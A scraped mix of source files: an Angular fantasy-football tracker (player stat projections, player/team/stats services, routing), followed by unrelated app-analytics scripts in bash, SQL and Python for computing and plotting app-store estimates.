"TDS": 3.1,
"ATT": 0.1,
"YDS_1": 0.6,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 100.5
},
{
"Player": "<NAME>",
"Team": "NO",
"REC": 32.8,
"YDS": 471.9,
"TDS": 3,
"ATT": 0.1,
"YDS_1": 0.4,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 98
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 34.5,
"YDS": 437.8,
"TDS": 2.6,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 93.3
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 35.9,
"YDS": 442.5,
"TDS": 2.2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 93.2
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 35.5,
"YDS": 423.4,
"TDS": 2.3,
"ATT": 1.3,
"YDS_1": 7.6,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 92.7
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 33.2,
"YDS": 434.1,
"TDS": 2.3,
"ATT": 2.5,
"YDS_1": 17.5,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 92.1
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 32.4,
"YDS": 402.4,
"TDS": 2.8,
"ATT": 3.2,
"YDS_1": 20.9,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 91.9
},
{
"Player": "<NAME>",
"Team": "TEN",
"REC": 34,
"YDS": 429.8,
"TDS": 2.3,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 90.5
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 28.8,
"YDS": 434.3,
"TDS": 2.6,
"ATT": 1.4,
"YDS_1": 7.9,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 88.7
},
{
"Player": "<NAME>",
"Team": "OAK",
"REC": 36,
"YDS": 396.3,
"TDS": 2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 87.6
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 32.7,
"YDS": 404.7,
"TDS": 2.3,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 86.9
},
{
"Player": "<NAME>",
"Team": "BAL",
"REC": 27.7,
"YDS": 395.7,
"TDS": 2.3,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 81.1
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 29.3,
"YDS": 362,
"TDS": 1.9,
"ATT": 2.5,
"YDS_1": 15.2,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 78.8
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 28.7,
"YDS": 380.7,
"TDS": 1.8,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 77.6
},
{
"Player": "<NAME>",
"Team": "HOU",
"REC": 23.8,
"YDS": 352.7,
"TDS": 2.4,
"ATT": 0,
"YDS_1": -0.1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 73.1
},
{
"Player": "<NAME>",
"Team": "CIN",
"REC": 25.9,
"YDS": 330.9,
"TDS": 2.2,
"ATT": 2,
"YDS_1": 9.9,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 72.9
},
{
"Player": "<NAME>",
"Team": "LAC",
"REC": 21.5,
"YDS": 337.4,
"TDS": 2,
"ATT": 5.9,
"YDS_1": 36.7,
"TDS_1": 0.4,
"FL": 0.1,
"FPTS": 72.7
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 25.8,
"YDS": 332.6,
"TDS": 2.1,
"ATT": 1.3,
"YDS_1": 8.1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 72.2
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 21.9,
"YDS": 303.7,
"TDS": 2.1,
"ATT": 5.8,
"YDS_1": 37.7,
"TDS_1": 0.5,
"FL": 0.1,
"FPTS": 71.5
},
{
"Player": "<NAME>",
"Team": "NYG",
"REC": 23.5,
"YDS": 352.2,
"TDS": 2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 70.6
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 25.1,
"YDS": 335.2,
"TDS": 2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 70.3
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 23.2,
"YDS": 321.1,
"TDS": 2.4,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0,
"FPTS": 69.6
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 98.2,
"YDS": 1236.1,
"TDS": 9.5,
"FL": 0.6,
"FPTS": 277.8
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 85.7,
"YDS": 1180.3,
"TDS": 6.6,
"FL": 0.3,
"FPTS": 242.7
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 90.5,
"YDS": 956,
"TDS": 6.9,
"FL": 0.5,
"FPTS": 226.7
},
{
"Player": "<NAME>",
"Team": "NYG",
"REC": 68.8,
"YDS": 824.5,
"TDS": 5.4,
"FL": 0.4,
"FPTS": 182.7
},
{
"Player": "<NAME>",
"Team": "NO",
"REC": 63.3,
"YDS": 794.5,
"TDS": 6,
"FL": 0.3,
"FPTS": 177.8
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 57.2,
"YDS": 816.1,
"TDS": 6.5,
"FL": 0.5,
"FPTS": 176.6
},
{
"Player": "<NAME>",
"Team": "LAC",
"REC": 54.9,
"YDS": 696.3,
"TDS": 6,
"FL": 0.3,
"FPTS": 159.6
},
{
"Player": "<NAME>",
"Team": "PIT",
"REC": 59.6,
"YDS": 677.7,
"TDS": 4.8,
"FL": 0.5,
"FPTS": 155.1
},
{
"Player": "<NAME>",
"Team": "ATL",
"REC": 62.4,
"YDS": 608.3,
"TDS": 4.4,
"FL": 0.3,
"FPTS": 148.9
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 62.8,
"YDS": 631.9,
"TDS": 3.8,
"FL": 0.5,
"FPTS": 147.6
},
{
"Player": "<NAME>",
"Team": "CLE",
"REC": 53.6,
"YDS": 629.7,
"TDS": 4.8,
"FL": 0.3,
"FPTS": 144.8
},
{
"Player": "<NAME>",
"Team": "TEN",
"REC": 53.1,
"YDS": 587.3,
"TDS": 3.8,
"FL": 0.5,
"FPTS": 133.9
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 48.4,
"YDS": 545.8,
"TDS": 5.2,
"FL": 0.4,
"FPTS": 133.1
},
{
"Player": "<NAME>",
"Team": "GB",
"REC": 52.4,
"YDS": 563.6,
"TDS": 4.1,
"FL": 0.3,
"FPTS": 132.8
},
{
"Player": "<NAME>",
"Team": "BAL",
"REC": 45.9,
"YDS": 603.1,
"TDS": 3.9,
"FL": 0.2,
"FPTS": 129.4
},
{
"Player": "<NAME>",
"Team": "CHI",
"REC": 48.5,
"YDS": 526.6,
"TDS": 4.4,
"FL": 0.4,
"FPTS": 127
},
{
"Player": "<NAME>",
"Team": "DET",
"REC": 50.2,
"YDS": 543.2,
"TDS": 3.9,
"FL": 0.9,
"FPTS": 126.3
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 45.7,
"YDS": 534.9,
"TDS": 4.5,
"FL": 0.2,
"FPTS": 125.8
},
{
"Player": "<NAME>",
"Team": "MIN",
"REC": 50.8,
"YDS": 495.6,
"TDS": 4,
"FL": 0.2,
"FPTS": 124
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 52.9,
"YDS": 496.8,
"TDS": 3.8,
"FL": 0.9,
"FPTS": 123.4
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 38.5,
"YDS": 473.8,
"TDS": 4.6,
"FL": 0.4,
"FPTS": 112.6
},
{
"Player": "<NAME>",
"Team": "DAL",
"REC": 45.9,
"YDS": 448.8,
"TDS": 3.4,
"FL": 0.3,
"FPTS": 110.7
},
{
"Player": "<NAME>",
"Team": "DEN",
"REC": 43.2,
"YDS": 479.7,
"TDS": 3.3,
"FL": 0.7,
"FPTS": 109.5
},
{
"Player": "<NAME>",
"Team": "CIN",
"REC": 40.1,
"YDS": 445.3,
"TDS": 3.4,
"FL": 0.2,
"FPTS": 104.9
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 34.2,
"YDS": 356.3,
"TDS": 4,
"FL": 0.2,
"FPTS": 93.2
},
{
"Player": "<NAME>",
"Team": "OAK",
"REC": 34.3,
"YDS": 374,
"TDS": 3.2,
"FL": 0.2,
"FPTS": 90.2
},
{
"Player": "<NAME>",
"Team": "SEA",
"REC": 28.6,
"YDS": 383.9,
"TDS": 3.4,
"FL": 0.2,
"FPTS": 87.1
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 35.6,
"YDS": 349.3,
"TDS": 2,
"FL": 0.2,
"FPTS": 82.3
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 30.1,
"YDS": 315.7,
"TDS": 3.4,
"FL": 0.5,
"FPTS": 81.1
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 29.1,
"YDS": 366.4,
"TDS": 2.4,
"FL": 0.2,
"FPTS": 79.5
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 33.5,
"YDS": 330.4,
"TDS": 1.9,
"FL": 0.5,
"FPTS": 76.7
},
{
"Player": "<NAME>",
"Team": "LAR",
"REC": 28.4,
"YDS": 307.2,
"TDS": 2.6,
"FL": 0.2,
"FPTS": 74.2
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 30.2,
"YDS": 277.5,
"TDS": 1.8,
"FL": 0.3,
"FPTS": 68.1
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 27.2,
"YDS": 276.5,
"TDS": 2,
"FL": 0.2,
"FPTS": 66.5
},
{
"Player": "<NAME>.",
"Team": "MIN",
"REC": 26.5,
"YDS": 274.8,
"TDS": 2,
"FL": 0.5,
"FPTS": 64.9
},
{
"Player": "<NAME>",
"Team": "NE",
"REC": 23.7,
"YDS": 268.1,
"TDS": 2.1,
"FL": 0.1,
"FPTS": 62.7
},
];
return {players, teams, stats};
}
}
<file_sep>import { Injectable } from '@angular/core';
import { Observable, of } from 'rxjs';
import { catchError, map, tap } from 'rxjs/operators';
import { HttpClient} from '@angular/common/http';
import { MessageService } from './message.service';
@Injectable({
providedIn: 'root'
})
export class StatsService {
private statsUrl = 'api/stats';
private numbersUrl = 'http://localhost:3000/players';
// private numbersUrl = 'http://api.fantasy.nfl.com/v1/players/stats?statType=seasonStats&season=2019&format=json/players';
stats: any;
constructor(private http: HttpClient, private messageService: MessageService) { }
searchPlayer(term: string): Observable<any> {
return this.http.get<any>(`${this.statsUrl}/?Player=${term}`)
// return this.http.get<any>('api/stats' + '/' + '?Player=' + term)
.pipe(
// map(stats => {this.stats = stats}),
// tap(() => console.log('Stats:', this.stats)),
tap(() => console.log('Fetched projected stats')),
catchError(this.messageService.handleError)
);
}
getStats(term: string): Observable<any> {
return this.http.get<any>(`${this.numbersUrl}/?name=${term}`)
.pipe(
// map(stats => {this.stats = stats}),
tap(() => console.log('Fetched actual stats')),
catchError(this.messageService.handleError)
);
}
}
<file_sep>import { Player } from '../shared/player';
export class Team {
id: number;
name: string;
created: object;
players: Player[];
}<file_sep>import { Component, OnInit, Input } from '@angular/core';
import { Observable, of } from 'rxjs';
import { StatsService } from "../services/stats.service";
@Component({
selector: 'app-stats',
templateUrl: './stats.component.html',
styleUrls: ['./stats.component.css']
})
export class StatsComponent implements OnInit {
stats: any;
numbers: any;
QB: boolean = false;
RB: boolean = false;
WR: boolean = false;
TE: boolean = false;
@Input() sendPlayer;
constructor( private statsService: StatsService ) { }
ngOnInit() { this.statsService.searchPlayer(this.sendPlayer.name)
.subscribe(stats => this.stats = stats);
this.statsService.getStats(this.sendPlayer.name)
.subscribe(numbers => this.numbers = numbers);
this.getPosition();
}
getPosition() {
if (this.sendPlayer.position == "QB") {
this.QB = true;
}
else if (this.sendPlayer.position == "RB") {
this.RB = true;
}
else if (this.sendPlayer.position == "WR") {
this.WR = true;
}
else if (this.sendPlayer.position == "TE") {
this.TE = true;
}
}
}
<file_sep>import { Injectable } from '@angular/core';
import { Observable, of, BehaviorSubject } from 'rxjs';
import { catchError, map, tap } from 'rxjs/operators';
import { Team } from '../shared/team';
import { HttpClient, HttpHeaders } from '@angular/common/http';
import { MessageService } from './message.service';
@Injectable({
providedIn: 'root'
})
export class TeamService {
team: Team;
private teamsUrl = 'api/teams';
httpOptions = {
headers: new HttpHeaders({ 'Content-Type': 'application/json' })
};
private teamSource = new BehaviorSubject( this.team );
currentTeam = this.teamSource.asObservable();
constructor(private http: HttpClient, private messageService: MessageService) { }
sendTeam(team) {
this.teamSource.next(team);
}
getTeams(): Observable<Team[]> {
return this.http.get<Team[]>(this.teamsUrl)
.pipe(
tap(() => console.log('Fetched teams')),
catchError(this.messageService.handleError)
);
}
addTeam(team: Team): Observable<Team> {
return this.http.post<Team>(this.teamsUrl, team, this.httpOptions)
.pipe(
tap((team: Team) => console.log(`Added team w/ id=${team.id}`)),
catchError(this.messageService.handleError)
);
}
deleteTeam(team: Team): Observable<Team> {
const id = team.id;
console.log(id);
const url = `${this.teamsUrl}/${id}`;
return this.http.delete<Team>(url, this.httpOptions).pipe(
tap((team: Team) => console.log(`Deleted team w/ id=${id}`)),
catchError(this.messageService.handleError)
);
}
}
<file_sep>import { Injectable } from '@angular/core';
import { Observable, of } from 'rxjs';
import { catchError, map, tap } from 'rxjs/operators';
// import { PLAYERS } from '../player_list';
import { Player } from '../shared/player';
import { HttpClient, HttpHeaders } from '@angular/common/http';
import { MessageService } from './message.service';
@Injectable({
providedIn: 'root'
})
export class PlayerService {
private playersUrl = 'api/players';
constructor(private http: HttpClient, private messageService: MessageService) { }
// getPlayers(): Observable<Player[]> {
// return of(PLAYERS);
// }
getPlayers(): Observable<Player[]> {
return this.http.get<Player[]>(this.playersUrl)
.pipe(
tap(() => console.log('Fetched players')),
catchError(this.messageService.handleError)
);
}
// getPlayer(name: string): Observable<Player> {
// return of(PLAYERS.find(player => player.name === name));
// }
getPlayer(id: number): Observable<Player> {
const url = `${this.playersUrl}/${id}`;
return this.http.get<Player>(url)
.pipe(
tap(() => console.log(`Fetched player with id = ${id}`)),
catchError(this.messageService.handleError)
);
}
getPlayersByPosition(term: string): Observable<Player[]> {
return this.http.get<Player[]>(`${this.playersUrl}/?position=${term}`)
.pipe(
// map(stats => {this.stats = stats}),
tap(() => console.log('Fetched actual stats')),
catchError(this.messageService.handleError)
);
}
}
<file_sep>import { BrowserModule } from '@angular/platform-browser';
import { Injector, NgModule } from '@angular/core';
import { FormsModule } from '@angular/forms';
import { ReactiveFormsModule } from '@angular/forms';
import { AppComponent } from './app.component';
import { PlayersComponent } from './players/players.component';
import { HeaderComponent } from './header/header.component';
import { TeamsComponent } from './teams/teams.component';
import { RoutingModule } from './routing/routing.module';
import { PlayerDetailComponent } from './playerdetail/playerdetail.component';
import { HttpClientModule } from '@angular/common/http';
import { HttpClientInMemoryWebApiModule } from 'angular-in-memory-web-api';
import { InMemoryDataService } from './services/in-memory-data.service';
import { StatsComponent } from './stats/stats.component';
import { HighlightDirective } from './directives/highlight.directive';
@NgModule({
declarations: [
AppComponent,
PlayersComponent,
HeaderComponent,
TeamsComponent,
PlayerDetailComponent,
StatsComponent,
HighlightDirective
],
imports: [
BrowserModule,
FormsModule,
ReactiveFormsModule,
RoutingModule,
HttpClientModule,
HttpClientInMemoryWebApiModule.forRoot(
InMemoryDataService, { dataEncapsulation: false, passThruUnknownUrl: true }
)
],
providers: [],
bootstrap: [AppComponent]
})
export class AppModule { }
<file_sep>import { Routes } from '@angular/router';
import { PlayersComponent } from '../players/players.component';
import { TeamsComponent } from '../teams/teams.component';
import { PlayerDetailComponent } from '../playerdetail/playerdetail.component';
export const routes: Routes = [
{ path: 'home', component: PlayersComponent },
{ path: 'team', component: TeamsComponent },
{ path: 'playerdetail/:id', component: PlayerDetailComponent },
{ path: '', redirectTo: '/home', pathMatch: 'full' }
];
|
eb23dbd3671fc49b3f616f335938af2f8db176f4
|
[
"TypeScript"
] | 11
|
TypeScript
|
cremmers/Fantasy-Track-Angular
|
f72e4319877f31b8ca228864f2a47f605a3c9d42
|
942fe2b924bdca0d3ba261f294a6af19847859b3
|
refs/heads/master
|
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
namespace WebVentas.Areas.Users.Controllers
{
[Area("Users")]//Especificamos la Area del controlador
public class UsersController : Controller
{
public IActionResult Users()
{
return View();
}
}
}
|
49dbe9bfdf32880e6be4362e0fa668fe0424a192
|
[
"C#"
] | 1
|
C#
|
gcajal/WebVentas
|
c6841addb0ba40309f0bee5f8a9b3d402127e5d7
|
d6b22ef72e1edf813a2e7ddfa1308d304af31d6d
|
refs/heads/master
|
<file_sep>/* eslint-disable react/prop-types */
import React from 'react';
// import PropTypes from 'prop-types';
import Popup from 'reactjs-popup';
import MapView from './MapView';
import '../styles/PopupCard.css';
const PopupCard = ({
listing,
date,
time,
venue,
address,
ticket,
location
}) => {
return (
<Popup
trigger={
<button className="trigger-button" type="button">
More Info
</button>
}
modal
nested
>
{(close) => (
<div className="popup">
<button className="close" onClick={close} type="button">
×
</button>
<div className="header"> {listing} </div>
<div className="content">
<p>Date: {date}</p>
<p>Time Start: {time}</p>
<p>Venue: {venue}</p>
<p>
Address: {address.address.line1}, {address.city.name}
{address.postalCode}
</p>
{address.accessibleSeatingDetail !== undefined
? `Accessibility: ${address.accessibleSeatingDetail}`
: 'Accessibility: Apologies, no accessibility information'}
<div className="buy-tickets">{ticket}</div>
{location && <MapView location={location} listing={listing} />}
</div>
<div className="actions">
<button
className="close-button"
onClick={() => {
close();
}}
type="button"
>
close
</button>
</div>
</div>
)}
</Popup>
);
};
// PopupCard.PropTypes = {
// listing: PropTypes.string.isRequired,
// date: PropTypes.number.isRequired,
// time: PropTypes.number.isRequired,
// venue: PropTypes.string.isRequired,
// address: PropTypes.shape({
// address: PropTypes.shape({
// line1: PropTypes.string
// }).isRequired,
// city: PropTypes.shape({
// name: PropTypes.string
// }).isRequired,
// postalCode: PropTypes.string,
// accessibleSeatingDetail: PropTypes.string
// }).isRequired,
// ticket: PropTypes.string.isRequired,
// location: PropTypes.objectOf(PropTypes.number).isRequired
// };
export default PopupCard;
<file_sep># Tonight

What's is there to do in my city? This is the question that this app tries to help answer. Tonight provides information about events going on in your city now and also in the future, should you wish to book ahead of time.
## About the application
This is a React application which utilises a backend proxy Express.js API (deployed on AWS) which in turn queries the Ticketmaster API to return events for city (UK city) passed in to the search bar. This is likely to be expanded and refined in the future, should we decide to take this beyond our course.
## Stack Employed
- ReactJS
- AWS deployed using serverless
- Express.js
## Project Status
This project is still in development and MVP is not yet complete.
## Screenshots / Media
Main search for same day events
<file_sep>import { render, screen } from '@testing-library/react';
import App from '../components/App';
test('renders learn react link', () => {
render(<App />);
expect(<App />).toMatchSnapshot();
});
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import '../styles/Nav.css';
import { useAuth0 } from '@auth0/auth0-react';
import Logo from '../Assets/tonight-logo.png';
const Nav = () => {
const { loginWithRedirect, logout, user, isLoading } = useAuth0();
return (
<div className="nav-div">
<Link to="/" className="Logo">
<img src={Logo} alt="logo" />
</Link>
{!isLoading && !user && (
<button type="button" className="Login" onClick={loginWithRedirect}>
Login
</button>
)}
{!isLoading && user && (
<>
<Link to="/account" className="Account-title">
My Account
</Link>
<button type="button" className="Logout" onClick={() => logout()}>
Logout
</button>
</>
)}
</div>
);
};
export default Nav;
<file_sep>import MainText from '../Assets/tonight-main.png';
import '../styles/landing-page.css';
const LandingPage = () => {
return (
<div className="landing-page-container">
<h3 className="WhatsOn">WHATS ON..</h3>
<img className="tonight-text" src={MainText} alt="tonight-logo" />
</div>
);
};
export default LandingPage;
<file_sep>import React from 'react';
import PropTypes from 'prop-types';
import '../styles/EventCard.css';
import PopupCard from './PopupCard';
const EventCards = ({
listing,
image,
venue,
address,
date,
time,
tickets,
location,
addFavourite,
id
}) => {
return (
<div className="eventCards">
<div className="eventCards_listing">{listing}</div>
<button
type="button"
onClick={() => addFavourite(id)}
className="Favorite"
>
♡ Favourite Event
</button>
<div className="eventCards_images">{image}</div>
<div className="eventCards_venue">{venue}</div>
<div className="eventCards_date">{date}</div>
<div className="eventCards_time">{time}</div>
<button className="eventCards_button" type="button">
<PopupCard
listing={listing}
ticket={tickets}
date={date}
time={time}
venue={venue}
address={address}
location={location}
/>
</button>
</div>
);
};
EventCards.propTypes = {
listing: PropTypes.string.isRequired,
image: PropTypes.string.isRequired,
venue: PropTypes.string.isRequired,
date: PropTypes.string.isRequired,
time: PropTypes.string.isRequired,
tickets: PropTypes.string.isRequired,
location: PropTypes.objectOf(PropTypes.number).isRequired,
address: PropTypes.objectOf(PropTypes.string).isRequired,
addFavourite: PropTypes.func.isRequired,
id: PropTypes.string.isRequired
};
export default EventCards;
|
8a79788bcaecbbfeb6e6bcb3d10399ff99a306bb
|
[
"JavaScript",
"Markdown"
] | 6
|
JavaScript
|
ellriffs/tonight-app
|
1ce2f76dd9e3e18f2f5c7df654eb05ca9a7d1824
|
b18de73a34f2404439b58a7e0817e7e3d4952742
|
HEAD
|
<repo_name>asutherland-aa/aa-data-science-alex-branch-test<file_sep>/old_investigations/generate_everything.sh
# This is an example of using various scripts to generate everything
declare -a countries=('United States' 'China' 'Japan' 'South Korea')
#declare -a countries=('United States')
declare year=2012
declare month=07
declare month_end=31
## Prepare the data
#python run_fetch_and_concat.py -s 143441,143444,143462,143465,143466 -d "${year}-${month}" -u Downloads,USD
#python run_fetch_and_concat.py -s 143441,143465,143462,143466 -d "${year}-${month}" -u Downloads,USD
for ((i=0; i<${#countries[@]}; i++))
do
c=${countries[$i]}
echo "Calculating SDA for ${c}..."
python run_calculate_sda.py -d "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_Downloads.csv" -u "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_USD.csv"
#-r "Rafael_data_July/${c}/AppAnnie_Estimates.csv"
echo "Generating Plots..."
Rscript plot_80_20.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_dist.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_improvement.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
#Rscript plot_80_20_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
#Rscript plot_dist_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
#Rscript plot_improvement_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_80_20_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_dist_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_improvement_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
echo "Finished, check the ./plots folder"
done
<file_sep>/int-vs-m-benchmark/sql/ios/1000d3-prepare_application_data-join_transactional_data.sql
/*
FUNCTIONAL DESCRIPTION : Determine if apps are universal
Determine if apps are monitor apps (universal apps cannot be monitor apps?)
Determine have inapp purchases ( if null they have?)
Create table structure to store regression results
DEPENDS ON TABLE(S) : temp.ranking_application_data, temp.in_app, temp.transactional_data
RESULTS IN TABLE(S) : temp.application_data
PROCEDURE : STEP 1.
*/
-- RETREIVING APPLICATION DATA FROM RANKINGS --
DROP TEMPORARY TABLE IF EXISTS temp.application_data;
CREATE TEMPORARY TABLE temp.application_data(
date date NOT NULL,
device_id TINYINT unsigned NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
application_id int(10) unsigned NOT NULL,
universal_app TINYINT unsigned NOT NULL,
monitor_app TINYINT unsigned NOT NULL,
price_usd decimal(9,2) DEFAULT NULL,
-- price changed kan niet null zijn?
price_changed TINYINT unsigned NOT NULL,
has_inapps TINYINT unsigned NOT NULL,
real_value decimal(9,2) DEFAULT NULL,
derived_value decimal(9,2) DEFAULT NULL,
derived_value_source VARCHAR(50) DEFAULT NULL,
estimate decimal(9,2) DEFAULT NULL,
estimate_source VARCHAR(50) DEFAULT NULL,
estimate_category_id smallint(5) unsigned DEFAULT NULL,
estimate_rank smallint(5) unsigned DEFAULT NULL,
estimate_extrapolated TINYINT unsigned DEFAULT NULL,
n smallint(5) unsigned DEFAULT NULL,
rsquare decimal(5,4) DEFAULT NULL,
fit_order TINYINT unsigned DEFAULT NULL,
stdev decimal(5,4) DEFAULT NULL,
df TINYINT unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (date, device_id,country_id, type, application_id),
INDEX category_index (date, device_id,country_id, type, estimate_category_id, estimate_rank)
)
SELECT
r.date,
r.device_id,
r.country_id,
r.type,
r.application_id,
-- definite universal determination:
IF(
r.type = 'gross',
GREATEST(IF(r.ranked_on_ipad AND r.ranked_on_iphone , 1, 0),IFNULL(t.iphone_app AND t.ipad_app,0)),
IFNULL(t.iphone_app AND t.ipad_app,IF(r.ranked_on_ipad AND r.ranked_on_iphone,1,0))
) AS universal_app,
IF(
IF(r.device_id = 1 AND (r.ranked_on_iphone = 1 OR t.iphone_app = 1),
t.value,
IF(r.device_id = 2 AND (r.ranked_on_ipad = 1 OR t.ipad_app = 1),
t.value,
null
)
) IS NOT NULL AND NOT
IF(
r.type = 'gross',
GREATEST(IF(r.ranked_on_ipad AND r.ranked_on_iphone , 1, 0),IFNULL(t.iphone_app AND t.ipad_app,0)),
IFNULL(t.iphone_app AND t.ipad_app,IF(r.ranked_on_ipad AND r.ranked_on_iphone,1,0))
),1,0) as monitor_app,
r.price_usd,
r.price_changed,
IFNULL(i.has_inapps,1) as has_inapps,
IF(r.device_id = 1 AND (r.ranked_on_iphone = 1 OR t.iphone_app = 1),
t.value,
IF(r.device_id = 2 AND (r.ranked_on_ipad = 1 OR t.ipad_app = 1),
t.value,
null
)
) AS real_value,
null AS derived_value,
null AS derived_value_source,
null AS estimate,
null AS estimate_source,
null AS estimate_category_id,
null AS estimate_rank,
null AS estimate_extrapolated,
null AS n,
null AS rsquare,
null AS fit_order,
null AS stdev,
null AS df
FROM temp.ranking_application_data r
LEFT JOIN temp.in_app i ON i.application_id = r.application_id
LEFT JOIN temp.download_data_per_parent_app t
ON t.date = r.date
AND t.country_id=r.country_id
AND t.type=r.type
AND t.application_id = r.application_id
AND t.usable_split_data = 0
;
UPDATE temp.application_data a
JOIN temp.transactional_data_split s ON
a.date = s.date AND
a.device_id = s.device_id AND
a.country_id = s.country_id AND
a.type = s.type AND
a.application_id = s.application_id
SET a.real_value = s.value,
a.universal_app = 0,
a.monitor_app = 1
;
<file_sep>/plotting/plot_time_series.py
import sys
import pandas as pd
import itertools
import pylab
import config
week_dict = {0: '0-Mon', 1: '1-Tue', 2: '2-Wed', 3: '3-Thu', 4: '4-Fri', 5: '5-Sat', 6: '6-Sun'}
platform = sys.argv[1]
if platform == 'ios':
stores_dict = config.IOS_STORES_DICT
elif platform == 'android':
stores_dict = config.ANDROID_STORES_DICT
else:
raise Exception("Wrong platform type. Should be ios or android")
ios_ratio = pd.read_csv("ratios_weekly_%s.csv" % platform)
# if platform == 'ios':
# # Fix the lack of data in 2012-12-24
# ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-30') & (ios_ratio['weekday'] == 0), 'ratio'] = ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-23') & (ios_ratio['weekday'] == 6), 'ratio']
# ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-30') & (ios_ratio['weekday'] == 0), 'units'] = ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-23') & (ios_ratio['weekday'] == 6), 'units']
# ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-30') & (ios_ratio['weekday'] == 0), 'count'] = ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-23') & (ios_ratio['weekday'] == 6), 'count']
ios_ratio['weekday'] = ios_ratio['weekday'].map(week_dict)
store_ids = ios_ratio['store_id'].unique()
units = ios_ratio['unit'].unique()
def normalize_ratios(df):
df['ratio_normalized'] = df['ratio'] / df['ratio'].sum()
return df
for (store_id, unit) in itertools.product(store_ids, units):
print(store_id, unit)
ios_ratio_us = ios_ratio[(ios_ratio['store_id'] == store_id) & (ios_ratio['unit'] == unit)]
if ios_ratio_us.shape[0] == 0:
break
fig, axes = pylab.subplots(nrows=2, ncols=2, figsize=(18, 16))
fig.text(0.5, 0.04, '%s %s' % (stores_dict[store_id], unit.capitalize()), ha='center', va='center', fontsize=20)
ios_ratio_us = ios_ratio_us.groupby('end_period').apply(normalize_ratios).reset_index()
ios_ratio_us_ratio = ios_ratio_us.pivot(index="end_period", columns="weekday", values="ratio")
ios_ratio_us_ratio.plot(ax=axes[0, 0], title="Ratio")
ios_ratio_us_ratio_normalized = ios_ratio_us.pivot(index="end_period", columns="weekday", values="ratio_normalized")
ios_ratio_us_ratio_normalized.plot(ax=axes[0, 1], title="Normalized Ratio")
ios_ratio_units = ios_ratio_us.pivot(index="end_period", columns="weekday", values="units")
